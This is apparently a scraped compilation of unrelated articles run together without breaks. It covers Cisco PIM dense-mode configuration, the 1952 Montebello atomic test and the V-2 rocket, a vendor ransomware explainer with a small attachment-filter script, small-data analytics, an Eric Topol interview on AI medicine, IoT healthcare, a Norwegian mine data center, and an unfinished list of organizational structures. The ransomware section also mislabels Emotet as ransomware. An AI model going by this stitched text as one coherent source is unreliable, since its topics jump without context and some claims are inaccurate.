In IGMP version 2, the roles are decoupled. The IGMP querier is elected by lowest IP address on the LAN, while PIM selects the DR by highest IP address to forward multicasts onto the LAN. (Splitting the two roles spreads the work.)
PIM also has a Join/Prune message, used as described above. There are also Graft and Graft-Ack messages, which tell us that grafting is done reliably (unlike the real world?).
And there is the PIM Assert message.
PIM-SM has 3 more message types: Register, Register-Stop, and RP-Reachability (not in PIMv2).
Configuring PIM Dense Mode
Configuring PIM-DM is downright easy compared to all the above.
Globally, enable multicast routing with the command:
ip multicast-routing
Then on each interface you wish to participate in multicasting, enable IP multicast and PIM with the interface command:
ip pim dense-mode
Actually, it is better practice to configure sparse-dense mode:
ip pim sparse-dense-mode
The reason is that this allows you to simply migrate some or all multicast groups to Sparse Mode, by letting the router know about a Rendezvous Point. And you can even do this without reconfiguring a lot of routers or router interfaces.
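Putting the pieces together, a minimal router configuration might look like the following sketch (the interface names and addresses are invented for illustration):

ip multicast-routing
!
interface FastEthernet0/0
ip address 192.168.1.1 255.255.255.0
ip pim sparse-dense-mode
!
interface Serial0/0
ip address 10.1.1.1 255.255.255.252
ip pim sparse-dense-mode

With this in place, any group with a known Rendezvous Point runs in Sparse Mode, and all other groups fall back to Dense Mode.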
You can configure stub networks for simple IP multicast. The idea is to not run PIM to stub parts of the network, like small remote sites, for simplicity. This is a particularly good idea with routers that are not under your control: you don’t want them sharing multicast routing with your routers. It also eliminates PIM-DM flooding to such routers (with older Cisco IOS releases).
To configure stub multicast, configure
ip igmp helper-address a.b.c.d
on any stub router LAN interfaces with potential multicast receivers. The address a.b.c.d is the address of the central PIM-speaking router. On the central router, you configure a filter to tune out any PIM messages the stub neighbor might send, with:
ip pim neighbor-filter access-list
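Here is a sketch of both sides (the addresses, interface names, and access list number are invented for illustration). On the stub router:

interface FastEthernet0/0
ip igmp helper-address 10.0.0.1

And on the central router, where 10.0.0.2 is the stub router's address:

access-list 1 deny 10.0.0.2
access-list 1 permit any
!
interface Serial0/0
ip pim neighbor-filter 1

The helper address relays the stub LAN's IGMP reports up to the central router, while the neighbor filter keeps the stub router from ever forming a PIM adjacency.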
See also the Cisco Command Guide for full syntax and options.
There are several show commands to help troubleshoot IP multicast. The ones I like best:
- show ip mroute
- show ip pim interface
- show ip pim neighbor
- show ip rpf
Since space is tight, I’ll refer you to the Command Reference for examples.
One troubleshooting note: if you do have high-bandwidth multicast in your network and you're using sparse-dense mode, make sure you use the Prune State Refresh feature in the newer Cisco IOS releases. I worry about routers “forgetting” they have an RP and reverting to Dense Mode, with periodic flooding. This might be a rare accidental occurrence, but it could really ruin your morning! You may also wish to consider RP robustness techniques, a topic for our later PIM-SM or Rendezvous Point article.
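If your IOS release supports it, state refresh origination is configured per interface on routers directly connected to the source. A sketch, using the default 60-second interval (treat the exact syntax as something to verify against your release's documentation):

interface FastEthernet0/0
ip pim state-refresh origination-interval 60

Routers not directly connected to the source don't originate these messages; they simply process and forward them.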
The recommended book for a lot of multicast topics: Developing IP Multicast Networks: The Definitive Guide to Designing and Deploying CISCO IP Multicast Networks, Beau Williamson.
Cisco also publishes extremely good multicast material on its website.
Next article: scaling with PIM Sparse Mode.
History is not just what happened in the past; it is a dynamic intersection of truths, biases, and expectations. A look at two very different historians, the Roman Tacitus and the Byzantine Procopius, demonstrates the variety and complexity inherent in the study of history. At least three different ways of accessing the past are involved: history can be remembered, recovered, or even invented. Each is flawed in some way. No historian or historical source exposes the complete and unvarnished truth, so memory is a fallible guide. Evidence brought to light by archaeology or historical research often arrives without context, which makes the value of recovered historical data difficult to assess. And several alleged ‘histories’ can be shown to have been invented; even so, these fabrications tell us a great deal about the values and dreams of a culture. All in all, it is often the best-told tales that endure.
Let’s discuss a few major historical events that took place on this day.
1952: Britain tests its first atomic bomb at a group of uninhabited islands off Western Australia.
The Montebello Islands are a group of around 170 small islands situated off the Pilbara coast of north-west Australia, roughly 140 kilometers from the mainland. The two main islands of the archipelago are Hermite Island and Trimouille Island. Before World War II, pearl fishing was carried out off the islands.

Britain's first nuclear weapon was tested at the Montebello Islands on 3 October 1952. The object of ‘Operation Hurricane’ was to evaluate the effects of an atomic bomb smuggled in aboard a ship, a threat of particular concern at the time. The plutonium implosion bomb was detonated inside HMS Plym, a 1,370-ton River-class frigate grounded in 12 m of water about 350 m offshore of Trimouille Island. The ensuing explosion left a crater on the seafloor 6 meters deep and some 300 meters across.
1942: Nazi Germany initiates the Space Age, launching the first rocket to reach outer space.
The Space Age is generally considered to have begun with the Soviet Union's launch of the first artificial satellite in 1957. In reality, it started over ten years earlier at a military test facility in Nazi Germany, where the first rocket to reach outer space was launched.

In 1936, Nazi Germany began developing a technical facility at Peenemünde, in the north of the island of Usedom. Construction relied largely on foreign workers, prisoners of war, concentration camp prisoners, and forced laborers. Considered the world's first major rocket testing center, the Peenemünde military test site, under the direction of physicist Wernher von Braun, was responsible for creating the regime's “wonder weapon” rocket: the Aggregat 4 (A4), known in Nazi propaganda as the “Vergeltungswaffe 2” (V-2).

On 3 October 1942, the first successful launch took place. The rocket became the first ballistic missile to reach outer space, climbing roughly 90 kilometers into the atmosphere, and it could carry its explosive payload at four times the speed of sound. Today it is considered the blueprint for later military and civilian rockets. From September 1944, the V-2 was used for attacks on Allied targets in Belgium, Great Britain, and France. The weapon killed thousands in those attacks, but even more people died building it: estimates suggest that as many as 20,000 workers were killed during production and testing.

After World War II ended, von Braun and around 500 of his best scientists surrendered to the USA, which sought to recruit the facility's engineers to help develop space technology. The technology von Braun developed led to his design of the Saturn rocket boosters that eventually put the first man on the Moon. The former test site is now home to the Peenemünde Historical Technical Museum, which in 2002 was awarded the Coventry Cross of Nails for its contribution to reconciliation and world peace.
What is ransomware? How can you protect against Ransomware?
The word “ransomware” comes from the English term “ransom”: money demanded for the release of a hostage. Ransomware is a malicious program that locks a computer, or the files on it, so that it can only be unlocked again by paying a ransom. How exactly does ransomware work? How big is the danger? And how can you protect yourself against it? We explain in this article!
What is ransomware?
Ransomware is a computer virus that is installed unnoticed on a victim's PC. What distinguishes ransomware from ordinary malware is that it comes into direct contact with the user of the affected system. The malware encrypts either individual files or the entire computer. The hacker then has control over the computer and demands a ransom: as long as the victim does not pay, the device stays encrypted.

If the infected device is part of a network, such as in a company, the malware can spread to the entire network and encrypt every device on it. This can shut down entire companies, hospitals, and universities.
An example of a ransomware attack – Emotet
Emotet is one of the best-known ransomware variants and has even made it into daily media coverage. Our Security Lab has taken a closer look at Emotet and examined it. In a detailed knowledge base page you can learn exactly how Emotet works.
What is a Cryptolocker / Cryptotrojan?
A cryptolocker is part of the ransomware family. It encrypts the user's documents and forces the victim to pay a ransom to get them back.

Ransomware attacks by cryptotrojans can have serious financial consequences for companies. Cryptotrojans have threatened the very existence of some companies and, in some cases, driven them into bankruptcy. It is the horror scenario par excellence: an employee catches a cryptotrojan on a work computer, and it does not take long for the malware to spread across the entire company network.
How big is the danger of ransomware?
The danger of ransomware is greater than one might think. Companies in particular should be on guard against infected emails. By 2018, cybercriminals had already extorted 8 billion euros. A considerable sum, but in 2019 even more was hijacked: the damage more than tripled compared to the previous year, to approximately 24 billion euros.

What is the reason for this rapid increase in successful ransomware attacks? Hackers have found the right niche. Sophisticated techniques and a little information about a company's employees (social engineering) enable hackers to infect an IT infrastructure with a single malicious email. Hospitals have been the most frequent victims of encryption attacks.
How does ransomware work?
It usually starts with a classic phishing email that serves as bait to download an infected file. In most cases, the infection happens via a booby-trapped PDF, DOC, or XLS file.

Once the victim opens the malicious file, the criminal has cleared the biggest hurdle: the ransomware installs itself on the system. Note that installation can happen independently of activation; the attack can be prepared in advance and triggered at a later time.

As soon as the ransomware is activated, the actual damage starts: the encryption process begins. Individual files on one system, or even several systems within a company network, can be encrypted. From then on, the user no longer has access to certain files, or to the entire computer, and has completely lost admin rights. Control is in the hands of the hacker.

Once everything is encrypted, a notification appears on the victim's screen demanding a ransom to remove the ransomware. At that point the attackers only have to wait for the victim to pay. Linking the ransom demand to a deadline is an effective way for cybercriminals to increase the pressure: if the system owners have not paid by the deadline, either the demand increases or the attackers begin deleting data.

Ransomware attacks can cause great damage, especially to companies. Experts and authorities usually advise against paying a ransom. Victims who do pay can only hope for the good faith of the hackers; often the data is never decrypted despite payment.
Protection from Ransomware
To protect against ransomware, companies should be proactive and develop a cybersecurity plan against malware. Since ransomware is very difficult to detect and fight, several protection mechanisms should be combined. The most important protection is training and sensitizing employees: only those who know that ransomware exists and how it operates can detect such attacks.
Since the email inbox is one of the classic entry points for malware, a good spam filter should block or at least quarantine all executable attachments, zip files and MS Office document macros. Hornetsecurity offers a solution and filters out these dangers with the spam and virus filter before the mail can be delivered. The constant further development of the filters ensures that the increasingly professional means and methods of attack are counteracted.
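To illustrate the attachment-filtering idea in the simplest possible terms, here is a minimal sketch in Python (the extension lists and the three-way verdict are illustrative assumptions, not a description of any vendor's filter):

import os

# Extensions that are directly executable or commonly abused by ransomware
RISKY = {".exe", ".js", ".vbs", ".scr", ".bat", ".ps1", ".jar"}
# Office formats that can carry macros, plus archives worth a closer look
SUSPECT = {".docm", ".xlsm", ".pptm", ".doc", ".xls", ".zip"}

def classify_attachment(filename: str) -> str:
    """Return 'block', 'quarantine', or 'allow' for an attachment name."""
    name = filename.lower()
    root, ext = os.path.splitext(name)
    if ext in RISKY:
        return "block"
    if ext in SUSPECT:
        return "quarantine"
    # Catch disguised double extensions such as "invoice.exe.pdf"
    inner = {"." + part for part in root.split(".")[1:]}
    if inner & RISKY:
        return "quarantine"
    return "allow"

print(classify_attachment("invoice.pdf"))      # allow
print(classify_attachment("invoice.pdf.exe"))  # block
print(classify_attachment("report.xlsm"))      # quarantine

A real gateway inspects file contents, not just names, but even this toy version shows how cheaply the most common lures can be caught.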
With one of the highest detection rates on the market (99.99%), 18 different virus scanners check email traffic. A contaminated attachment that has been packed several times to make it unrecognizable is still detected by Hornetsecurity's virus scanners and categorized as spam.
365 Threat Monitor goes one step further and reliably detects ransomware attacks as well as various types of malware that are still unknown. Hornetsecurity Advanced Threat Protection (ATP) offers solutions on a broad basis. These include URL rewriting and URL scanning.
If an attack is successful, it is important to have up-to-date backups available. That way, an older, uninfected version can be restored, keeping data loss as low as possible. Backups can be made manually or automatically; for companies, a cloud backup solution is a good option.

Email is the primary delivery channel for ransomware attacks. Well-camouflaged emails reach employees at the target company with PDF, EXE, or JPEG attachments. The display of file extensions is deactivated by default in most email clients and operating systems, which is why the user usually cannot recognize the true format of a file at first glance.
Unintentionally, the infected files are opened and the ransomware is executed. Therefore, it is important that you enable the viewing of file extensions in your email client settings.
Closing vulnerabilities is also very important. Microsoft's Remote Desktop Protocol is a frequent entry point, and in some cases it allows ransomware to spread through the local network within a very short time. Updating systems is also absolutely necessary: the older the software, the more entry points are known and available. If you are still using Windows 7 or even Windows XP today, you should not be surprised if your computer is infected and encrypted. WannaCry, for example, exploited a gap in outdated Windows systems (EternalBlue) that was simply ignored by many companies; updates and patches were not applied, which resulted in a large number of successful ransomware attacks.
Are there ransomware scanners?
If the ransomware is already on the computer, it is usually too late. If the ransomware has not yet been activated, an up-to-date anti-virus program will help. However, the most sensible solutions are those that detect ransomware before it reaches the computer. Classic virus scanners, such as GDATA, act against all types of malware; for protection against infected emails, an extended spam filter should be used.
Here, for example, an anti-ransomware scanner such as the cloud solution Advanced Threat Protection from Hornetsecurity can help. The service protects against attacks with ransomware such as Locky, Tesla or Petya, filters out phishing mails and fends off so-called blended threats. To achieve this, Hornetsecurity ATP uses various detection mechanisms: In addition to a sandbox, URL rewriting and URL scanning are also used. Freezing, i.e. the “freezing” of suspicious e-mails, is also part of Hornetsecurity ATP.
How to remove Ransomware?
Once the ransomware is on the computer and has infected it, there is usually no good way out. Either you pay the ransom (the police advise against it) or you set up the computer anew (and hope for an up-to-date backup). For some ransomware attacks, however, there are decryption tools: visit https://www.nomoreransom.org/crypto-sheriff.php?lang=en. No More Ransom provides ransomware decryption for over 50 different ransomware types.
What types of ransomware exist?
There are basically two different types of ransomware. Crypto ransomware encrypts files so that the user has no access to them. Locker ransomware locks the user out of the computer entirely.

There are also subtypes of these two variants. Scareware is fake software that claims to find errors and problems on the PC that do not exist, then demands money to fix them. Scareware can also lock the computer (locker ransomware).

Doxware, also called leakware, extorts users with allegedly stolen data: whoever does not pay is threatened with having their data published.
Risk of ransomware for companies
The danger ransomware poses to companies is enormous. If a private computer is encrypted, that is annoying, but usually no reason for personal insolvency. If a company computer is infected, it can lead to the company's bankruptcy. Ransomware often spreads throughout the entire network and infects every device on it. The result: entire companies can no longer operate. Files are lost, working time is lost, and work cannot continue.
Which ransomware is in use in 2020?
It is early 2020, and the first ransomware wave is already in full swing. The daily reports on Greta Thunberg and Fridays for Future are now also being exploited by criminals, who send emails in the name of the young activist. The Hornetsecurity Security Lab has intercepted emails in which cybercriminals ask recipients for support in a large demonstration in favor of climate protection. The time and address of the global strike can allegedly be found in the attached file. When the recipient opens the attachment, an encrypted document appears, asking the user to activate editing and content. Following this instruction executes a macro that downloads the malware.
Should I pay the ransom for a ransomware attack?
No. Experts and investigating authorities advise against paying the ransom. Often the data is not decrypted despite payment, and the computer remains unusable. Anti-ransomware solutions and preventive measures should be used instead, so that paying a ransom never becomes an option in the first place.
Visit Our Knowledge Base
Did you like our contribution from the knowledge base on the subject of ransomware? Then visit the overview page of our knowledge base, where you can learn more about topics such as DDoS attacks, cryptomining, the Cryptolocker virus, phishing, brute force attacks, GoBD, the cyber kill chain, IT security, and computer viruses.
Big opportunities in small data
With the world cranking out over two exabytes of data on a daily basis, it’s no wonder big data is all the rage. It’s a natural consequence of networked access to any and all types of data sources. And with the emergence of the Internet of Things (IoT), the volume is rapidly growing from exabytes to zettabytes.
Data analytics goes hand in hand with big data. Its goal is to more accurately predict what you’re likely to do next, so the things you need will be waiting for you precisely when you need them.
At some point down the road as the cloud becomes an inescapable part of our world, the matching of need and availability will become even more transparent and instantaneous. This will be enabled in part by a technology that’s quietly emerging on the other end of the spectrum, known as small data.
Big and small data differ not only with regard to volume, format and structure. Approaches to analyzing and acting on the two types are also markedly different. Let’s do a comparison and see where KM fits in.
The cosmos of big data
Big data uses open source platforms such as Hadoop, often in a peer-networked configuration, to store massive volumes of data. Tools like MapReduce extract the data, and an array of statistics software, pattern matching and machine learning algorithms are applied.
As a result, upward of trillions of data points are reduced, often into a simple mean and standard deviation or into various categorical representations, i.e., “buckets.” Rule sets are produced that generate recommendations aimed at specific segments of the population. By doing that, big data seeks to help organizations make better business decisions based on the aggregate behavioral tendencies of the population segments in each bucket.
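As a toy illustration of this reduce-then-bucket pattern (the spend figures, thresholds, segment names, and offers below are all invented, and a real pipeline would run this as distributed MapReduce jobs rather than in-memory Python):

import statistics

# Stand-ins for billions of spend-per-visit data points
spend = [12.0, 48.5, 7.25, 95.0, 33.0, 150.0, 22.5, 61.0]

# Step 1: reduce the raw points to summary statistics
mean = statistics.mean(spend)
stdev = statistics.stdev(spend)

# Step 2: collapse each customer into a coarse bucket
# (half a standard deviation either side of the mean)
def bucket(x: float) -> str:
    if x > mean + 0.5 * stdev:
        return "big spender"
    if x < mean - 0.5 * stdev:
        return "bargain hunter"
    return "typical"

# Step 3: a rule set keyed on buckets, not individuals
offers = {"big spender": "loyalty upgrade",
          "bargain hunter": "discount coupon",
          "typical": "seasonal catalog"}

for x in spend:
    print(f"{x:7.2f} -> {bucket(x):14s} -> {offers[bucket(x)]}")

Eight data points already feel cramped in three buckets; imagine trillions.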
But that approach has its drawbacks. The greater the reduction, the more context and individuality are lost. What might be an abnormal reading for some (such as a prolonged, low-grade fever) could be completely normal for others. Another drawback is that as the number of rules for various conditions and circumstances grows, combinatorics makes the rule sets increasingly difficult to maintain.
Perhaps the greatest shortfall is the lack of capacity for measuring unintended consequences. As is often the case in so-called “data-driven” decisions, the resulting damage may not be discovered until it’s too late.
On the other hand, there are many positive benefits to big data. If your home address is in the path of a severe storm, the entire supply network mobilizes to help you quickly stock up on whatever emergency supplies you might need.
The law of large numbers also comes into play. Direct marketers are delighted if data analytics improves their response rates by even half a percent. The same goes for politics. If you can garner support from 25 percent of one group, 15 percent of another and 11 percent of the rest, congratulations—you’ve won a majority of the vote!
The microworld of small data
Small data also uses the power of peer-networked computing. In this case, the goal is to create and maintain millions, even billions of much smaller, highly individualized buckets.
The emerging array of small data analysis tools consists of graph or other NoSQL databases, personal ontologies, state and goal spaces and generative rule sets. Instead of maintaining large data repositories, small data uses those tools to build a computationally based model of the state of an individual (physical health, financial health, education, etc.) as the primary record. It then uses a stream of individualized data inputs to update and adjust the model.
At that point, unlike in big data, input data are discarded. Then the state changes of the model are analyzed, focusing on aspects such as learning behaviors, lifestyle habits, etc. Instead of attempting to identify and act on mass-market trends, rules generate recommendations that focus on influencing individual behaviors at the deep structure level (e.g., memory engrams). Over time, the rules are adjusted as well. Once in place, small data rule sets are more stable and less complex than those typically associated with big data.
All of that dramatically reduces storage requirements while producing resources that can be more easily de-individualized and shared. That translates into a different and much more manageable set of governance policies and responsibilities.
Opportunities for KM
For decades, we’ve been promoting the notion of mass customization. From building a playlist to configuring your own tablet/laptop, it’s become commonplace in our consumer-based society. But we haven’t even scratched the surface of what small data can do. Here are three simple steps you can take:
- Look for any market niche in which the current one-size-fits-all model might be replaced with something built for “you and only you.”
- Replace the whole notion of databases and analytics with personal ontologies that monitor changes in the state of the user. Note that this can be applied to devices and systems as well. Complex ontologies may not always be necessary. In many circumstances, a simple concept space or topic map will suffice.
- Generate and maintain a set of rules for (a) analyzing the current state of the person, device or system and (b) recommending behavioral changes aimed at advancing toward the goal state.
For example, in the area of personal health and fitness, every person has a unique physiology, the attributes of which are represented in the model. Vital signs and other data are continuously streamed from devices such as Fitbit, along with records that may include food and liquid intake, medicines, air quality, periods of rest and activity, etc. All can be used to update the state of the model and generate recommendations to correct negative tendencies and reinforce positive behaviors.
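A minimal sketch of that idea follows (the vitals, thresholds, goal, and smoothing factor are invented for illustration; a real coach would use a personal ontology and clinically validated rules):

from dataclasses import dataclass

@dataclass
class HealthState:
    """Tiny per-person model: the state is the record, not the raw data."""
    resting_hr: float          # smoothed resting heart rate (bpm)
    goal_hr: float = 60.0      # personal goal state
    alpha: float = 0.1         # weight given to each new reading

    def update(self, reading: float) -> None:
        # Fold the new reading into the state; the input is then discarded
        self.resting_hr = (1 - self.alpha) * self.resting_hr + self.alpha * reading

    def recommend(self) -> str:
        gap = self.resting_hr - self.goal_hr
        if gap > 10:
            return "Trend is up: add 20 minutes of light cardio today."
        if gap > 3:
            return "Slightly above your goal: take the stairs this week."
        return "On track: keep doing what you're doing."

me = HealthState(resting_hr=72.0)
for reading in [71, 74, 76, 73, 75]:   # streamed from a wearable
    me.update(reading)
print(round(me.resting_hr, 1), "->", me.recommend())

The state object is the only thing stored; each reading is folded in and thrown away, which is exactly what keeps the digital footprint small.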
The same principles apply to education, in which every person has unique mental models and learning styles. Similarly, consumers can be guided to help choose and use products more efficiently and effectively.
Action to take
Look for anything resembling a “one-size-fits-all” approach, or that lumps customers, products and services into groups or categories. Rather than attempting to pick and choose among groups, or worse yet “playing the averages,” put your brain trust to work at designing new business models that create the best, most unique experience possible for each individual customer.
Don’t hesitate to consider complex systems like the human physiology, the environment or a nation’s economy. For these, think state, not data.
Big data has its place. But by obsessing over data we’ve missed the true essence of knowledge representation and how we might influence behaviors through deep structure modeling. The added benefit is that this can be accomplished within an extremely small digital footprint.
In the age of “black swans,” where dramatic changes can appear overnight, your best bet may very well be to spread your risk across as many unique signatures as possible. Small data may be the disruptive technology you’re looking for to propel you to the forefront of the next economic wave.
Welcome to TechTalks’ AI book reviews, a series of posts that explore the latest literature on AI. This post is the second part of a two-part interview with Dr. Eric Topol about the impact of artificial intelligence on health care and medicine.

In the first part of our interview with Dr. Eric Topol, we discussed how artificial intelligence algorithms can return the gift of time to doctors and help them have more human interactions with their patients. This is a subject that Dr. Topol discusses early on in his latest book “Deep Medicine: How Artificial Intelligence Can Make Healthcare Human Again.”

Another topic Dr. Topol discussed was the role of artificial intelligence in giving every person more insight into, and control over, their own health. This is one of the areas where deep learning algorithms have made great inroads.

Fewer visits to the doctor

Thanks to innovations in the field of the internet of things (IoT) and wearables, there are plenty of tools that patients can carry with them to regularly collect vital signs and other health-related data. This information can then be fed into neural networks, which draw pertinent insights and conclusions from it.

For patients, it might mean fewer visits to the doctor.
“For the patients, AI gives them more charge. It lets them handle many common diagnoses without the need for a doctor, and track the data they generate themselves, to guide their health,” Dr. Topol says.

There are now many personal health devices that can collect important data at short intervals and run it through AI algorithms to obtain important information about a patient's health without the need to visit a doctor. Complementing them are several AI-powered health assistants that provide basic-but-effective diagnoses that would otherwise have required going to a clinic and waiting your turn.
The AI-powered virtual medical coach
But the future, Dr. Topol envisions, is broad health support. If, for instance, you're at risk for a condition known from your genome, such as heart disease, AI-powered health care devices will accrue your data moment to moment, seamlessly, and feed it into a deep learning algorithm tailored to your condition. The AI will also improve its performance with up-to-date world medical literature and data relevant to your condition.
“The AI has everything about your prior medical history, your labs, your scans, your genome, sensors you’re wearing, your environmental sensors, medical literature. All this data is just continually being assessed to give you feedback, whether that’s through an avatar or speech or text, you can pick that,” Dr. Topol says.
For the moment, AI assistance exists for limited conditions, like managing diabetes. But the technology will expand to other areas as the pieces come together. As data collection and analysis become easier and more affordable, AI algorithms will be able to train on deep data about thousands and millions of patients and provide the best advice and coaching.
“The way it works today is there’s this one-off appointment with the doctor. In the future, you will have a coach that is with you all the time as long as you want to have this coaching operation,” Dr. Topol says. “We have this unique capability of bringing in massive amounts of data about a given individual, and processing the data with AI algorithms and giving feedback, and that is another way to decompress the role of the doctor whereby the person who is getting this feedback could contact this doctor when there’s need. The virtual medical coach is starting to get legs. Eventually it will be a way, a path to prevention, which is fulfilling a dream we never really actualized before.”
Who will own health data?
The privacy implications of data-hungry AI algorithms are already being widely discussed by scientists and thought leaders. Who will own the massive amounts of data that patients generate? Can we trust large tech companies with our health profiles? If not, should governments take care of the data? Any of those scenarios can turn into a privacy disaster, especially as AI algorithms become increasingly efficient at influencing people in inconspicuous ways.
For the moment, patient data is scattered across the archives of different hospitals and health organizations and the servers of tech companies. There’s no single store where patients can access their data.
Dr. Topol believes that in the future, data will belong exclusively to the patient, a point he expands on in Deep Medicine. “Undoubtedly, there’s going to be progressive democratization. Once the data is imminently portable, you can’t withhold it from people. People should own their data,” he says. “There is no home today for owing data, only parts of it are in electronic records, and even that’s dispersed quite widely. When you’re generating data, more and more people are going to be using medicalized sensors, wearable biosensors, and you will have our genome assessed and gut microbiome assessed, and all these other data—they don’t sit anywhere.”
In addition to the privacy implications of patient data being at the mercy of other entities, the scattered structure of health data makes it hard to train efficient AI algorithms. “If you have all your data, you can use it as input for any deep learning, AI algorithm. Today, no one has all that data properly aggregated. So if you don’t have good input, you’re not going to have good output from AI algorithms,” Dr. Topol remarks.
The perils of having too much health data
While we explore the benefits of data- and AI-driven self-care, we must also consider the possible negative effects of too much exposure to health data. Studies show that tracking symptoms too closely can have an adverse effect on the health of patients, creating a feedback loop in which seeing negative symptoms leads to anxiety, which further aggravates the symptoms, and so on.
Dr. Topol acknowledges that collecting data at high frequency and returning it to the patient can make things worse by generating false positives and causing anxiety. That’s why there’s no one-size-fits-all approach that everyone should adopt.
“It has to be used in a very special, specific way, for the right person, at the right time, rather than just broadly distributed or marketed,” Dr. Topol warns.
As an example, Dr. Topol mentions the Apple Watch Series 4, which has built-in functionality that uses AI to detect atrial fibrillation, a condition that causes abnormal heart rhythms and can lead to severe heart failure. In several cases, the Apple Watch has been able to save patients' lives by detecting early symptoms. But studies also show that it can produce false positives for people who don't have heart problems.
“Apple Watch is being marketed as a way to monitor your heart rhythm for everyone. That’s not good, because most people, especially people who are young, less than age 50, their risk of having atrial fibrillation is exceptionally low,” Dr. Topol says, adding that the feature can cause a false alarm, pushing the user down a tunnel that could wind up with all sorts of negative things.
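The statistics behind that warning are worth seeing. In the sketch below, the sensitivity, specificity, and prevalence figures are illustrative assumptions (not Apple's published numbers), chosen only to show how screening a low-prevalence population floods the results with false alarms:

def positive_predictive_value(sensitivity, specificity, prevalence):
    """P(disease | positive test) via Bayes' rule."""
    true_pos = sensitivity * prevalence
    false_pos = (1 - specificity) * (1 - prevalence)
    return true_pos / (true_pos + false_pos)

# The same hypothetical detector, aimed at two very different populations
for prevalence in (0.001, 0.10):   # healthy 30-year-olds vs. at-risk seniors
    ppv = positive_predictive_value(0.98, 0.98, prevalence)
    print(f"prevalence {prevalence:6.1%} -> chance an alert is real: {ppv:.1%}")

At a prevalence of 0.1 percent, roughly 19 out of every 20 alerts would be false, which is precisely the tunnel of needless follow-up Dr. Topol describes.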
“So what we have are great powerful tools that have to be applied with great discrimination, that is with very careful, judicious use, which isn’t likely to happen by accident. It’s going to take a lot of work,” Dr. Topol says.
Doctors naturally want to improve their services to patients, and technology is now giving them the ability to extend their reach and improve their quality of care. From telemedicine to the internet of things (IoT) and 3D-printed medication, we look at the top tech items doctors are eager for this Christmas.
The IoT comes to healthcare
The IoT has been making waves in virtually every industry. As the name implies, the IoT is comprised of Wi-Fi-enabled devices, or ‘things’, connected via the internet. Doctors can now make use of IoT devices to help them treat their patients’ problems in real-time. The list of possible benefits is considerable.
Firstly, IoT devices enable doctors to monitor a patient’s health at a distance. Individual doctors and hospitals no longer have to ask patients to come to them to monitor their health, meaning more healthcare and specialty medical services can be made available to those in remote areas.
Telehealth is becoming a reality
Doctors understand that some patients find it difficult to visit them at their offices or are unable to visit a hospital for a check-up. One viable solution is telemedicine – where healthcare professionals consult with their patients in real-time over the internet using video chat software.
Thanks to advances in IoT, telemedicine is taking one step further and allowing doctors to give patients health check-ups remotely using internet-enabled wearable technology. A patient with a wearable device, such as a smartwatch, can aid the doctor in diagnosing and treating illnesses by relaying information such as their heart rate and blood pressure.
3D-printed medication is on its way

Many types of medication are designed for general use and, as such, their dosages may not be right for some people. This is where 3D printing can assist, allowing manufacturers to custom-make medication for individual needs.
3D-printing technology is now becoming inexpensive enough to be applied to medication manufacturing. In addition to producing a single pill at the right dosage for a specific patient, manufacturers can combine different drugs in a single tablet for patients who require several types of medication.
These are just a few of the tech items that are sitting high on doctors’ Christmas wish lists this year. As the associated technology improves, these healthcare solutions will hopefully become more readily available to doctors and medical organizations alike.
Companies are building data centers in places you’d least expect. We’ve heard of Microsoft’s underwater data center and Kolos’ Arctic data center. And just when we thought this was the limit, ABB just helped create an underground data center in Europe.
This data center is special because it is situated in a retired mine, 150 meters into the side of a mountain in Lefdal, Norway. But why the side of a mountain? Well, it turns out that an abandoned mountainside mine has almost everything a data center would need.
The Mountain Side Offers Better Cooling
A data center uses a lot of power. It needs power to run its high-density server stacks, and it needs power to operate the air conditioning that keeps the computers cool and working efficiently. A mountainside offers temperatures that are lower and more stable than other locations.

Thanks to its location in the mountainside, the data center has access to water that it uses for cooling. As a result, the server containers can run at up to 50 kW of power per container, far more than the 7-8 kW you would expect with traditional air cooling.
In addition to the lower temperatures on the mountainside, ABB, which helped build the facility, took the data center's cooling to a whole new level by using glacial water from a nearby fjord.
Additionally, the data center is located below the fjord’s water level. This eliminates the need for high-capacity pumps that would otherwise be required to pump water uphill to get to the data center’s heat exchangers.
A Mine is Highly Secure, and So is the Data Center
The data center's location in a mine makes it extremely secure. Governments protect mines because, if not well taken care of, mines can cause serious environmental damage. Besides, mines make a lot of money for governments from the sale of natural resources.
Leveraging Assets in the Local Environment
The fact that the data center is located in a mine means that it can use the existing infrastructure to cater for its power needs. For its base electricity needs, the data center turned to ABB to create a robust medium-voltage backbone.
For extra redundancy, ABB also integrated renewable energy sources in the surroundings.
A data center needs a stable source of power, particularly during the startup phase. This data center currently runs on 10 MW. When it nears full capacity in the future, it will need around 200 MW.
ABB constructed the power infrastructure that will support the data center’s growth over the next couple of years. For example, ABB connected the data center to four glacier-powered hydropower stations and two wind farms.
How Redundancy is Guaranteed
To ensure the data center's resilience, ABB installed a decentralized uninterruptible power supply (UPS) system. With the UPS, each block in the data center has its own independent power supply.

In case of a blackout, the UPS takes over in a matter of milliseconds. This ensures that the servers keep running until the backup generators intervene.
What the Future Holds for the Data Center
ABB takes a lot of pride in being part of this innovative project. In today's world, energy efficiency in data centers is not just a desire but a need. What ABB has accomplished opens the door to many other innovative ideas regarding data center locations.

The data center has around 120,000 square meters of white space integrated into the retired mine. This space will be filled out by containers supplied by Rittal, which will then be converted into server homes.
8 Common Types of Organizational Structures in Project Management
An organizational structure is a standard hierarchy of operations. It defines how you can divide, coordinate, and direct groups. Moreover, it defines the positions and describes the tasks required to achieve an organization's objectives and vision.

Organizational structures aren't set in stone; they are tweaked according to the organization's size, needs, and philosophy. In this article, you'll learn the nitty-gritty of the different types of organizational structures in project management and how they function.
You may also like: PMP Certification: A Step-by-step Guide for Beginners in 2021
Features and Types of Organizational Structure
When choosing an organizational structure, certain features shouldn't be overlooked.
The key elements that contribute to a proper organizational structure are as follows:
- Degree of alignment with organizational objectives
- Accountability assignment
- Delegation of Capabilities
- Simplicity of Design
- Physical locations
1. Organic or Simple Organization
This type of organization is very flexible and able to adapt well to market changes.
This structure is characterized by having few rules, regulations and management layers and a decentralized decision-making layout.
An organic organization's design deals well with a rapidly changing environment. People work side by side and communicate quickly and often, solving unforeseen problems, issues, and requirements as they arise.
Here, the project manager has very little or no authority, and may or may not have a designated job role.
2. Line Organization
This is the simplest form of organizational structure that you'll find across small companies. It has well-defined authority levels in the hierarchical structure. Power flows from the top down to different operational levels or workers.
The hierarchical structure clearly defines authority, responsibility, and accountability at each level.
Due to its simplicity, authority and responsibilities are transparent and easily traceable. Communication is fast and easy because employees get quick feedback and respond fast.
The project manager performs duties based on position or authority in the hierarchy. Some organizations don't have this position at all; where it does exist, the project manager may have little or nothing to do.
3. Line and Staff Organization
